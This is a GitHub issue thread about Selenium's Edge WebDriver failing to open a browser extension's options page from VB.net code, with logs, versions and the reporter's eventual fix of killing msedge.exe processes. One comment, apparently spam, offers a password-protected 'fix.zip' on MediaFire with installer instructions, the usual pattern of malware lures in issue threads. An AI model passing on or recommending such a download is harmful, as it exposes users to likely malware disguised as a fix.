### ISSUE TITLE
[🐛 Bug]: Selenium edge driver cannot go to extension page using codes

### ISSUE THREAD

**Issue by fanheilam** [SeleniumHQ/selenium#14455]
### What happened?

I'm trying to use Selenium 4 to do some automation on extension of web browser. Currently, I just use it on Microsoft Edge driver. I found that I was unable to open any extension of Edge, Firefox or Chrome. (Using Vb.net)

In fact, when this was executed, that ("chrome-extension://odphnbhiddhdpoccbialllejaajemdio/options.html") will not be opened. But, I can go to that page manually without any problem. This means that extension path is correct. But, it doesn't work when using the code to open it automatically. Does anyone have any idea?

In fact, when I try to navigate to a webpage using WebDriver, I get an ERR_BLOCKED_BY_CLIENT error, and the DevTools listening on ws://127.0.0.1:13787/devtools/browser/4f6b659e-9f69-4303-a63e-8cc8b91e44f6 error message.

I've tried ignoring certificate errors using the --ignore-certificate-errors argument, but it doesn't seem to work. I've also tried disabling DevTools and adjusting the log level, but the issue persists.

Until I add the following line of code, the error message gone: 
**options.AddArgument("--remote-debugging-pipe")**

But, my target is to turn on some functionality of an extension. So, I tried and tried again. It never worked.

Hope somebody can help.

### How can we reproduce the issue?

```shell
Here's my code:

    Imports OpenQA.Selenium
    Imports OpenQA.Selenium.Edge
    Imports OpenQA.Selenium.Support.UI

    Public Class Form1
        Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
            Dim options As New EdgeOptions()
            options.AddArgument("--user-data-dir=C:\Users\jasonfan\AppData\Local\Microsoft\Edge\User Data")
            options.AddArgument("--no-sandbox")
            options.AddArgument("--remote-debugging-pipe")`
            options.AddArgument("--allow-running-insecure-content")
            options.AddArgument("--ignore-certificate-errors")

            Dim driver As IWebDriver = New EdgeDriver(options)

            driver.Navigate().GoToUrl("chrome-extension://odphnbhiddhdpoccbialllejaajemdio/options.html")

        End Sub
    End Class
```

### Relevant log output

```shell
Starting Microsoft Edge WebDriver 128.0.2739.42 (e015505d79c9432c75e2a9131c445776c61af592) on port 2232
To submit feedback, report a bug, or suggest new features, please visit https://github.com/MicrosoftEdge/EdgeWebDriver

Only local connections are allowed.
Please see https://aka.ms/WebDriverSecurity for suggestions on keeping Microsoft Edge WebDriver safe.

Microsoft Edge WebDriver was started successfully.
msedgedriver was started successfully on port 2232.

DevTools listening on ws://127.0.0.1:2235/devtools/browser/4d3c65b6-f823-4666-b956-11900d2175e6
[30828:30680:0827/155830.737:ERROR:campaign_history_database_impl.cc(386)] Campaign history database not initialized NurturingBrowserCampaignHistory
[30828:30680:0827/155830.892:ERROR:campaign_history_database_impl.cc(60)] Campaign history database version not compatible.
[30828:34552:0827/155831.057:ERROR:chrome_web_ui_controller_factory.cc(1555)] Requested load of chrome://newtab/ for incorrect profile type.
```

### Operating System

Windows 11

### Selenium version

Selenium.WebDriver 4.23.0; Selenium.Support 4.23.0

### What are the browser(s) and version(s) where you see this issue?

Microsoft Edge 128.0.2739.42

### What are the browser driver(s) and version(s) where you see this issue?

WebDriver 128.0.2739.42

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fanheilam** [comment]
I just got it resolved. Seems like I need to kill all the msedge.exe tasks before running the project.
Anyway, any comments are welcome.
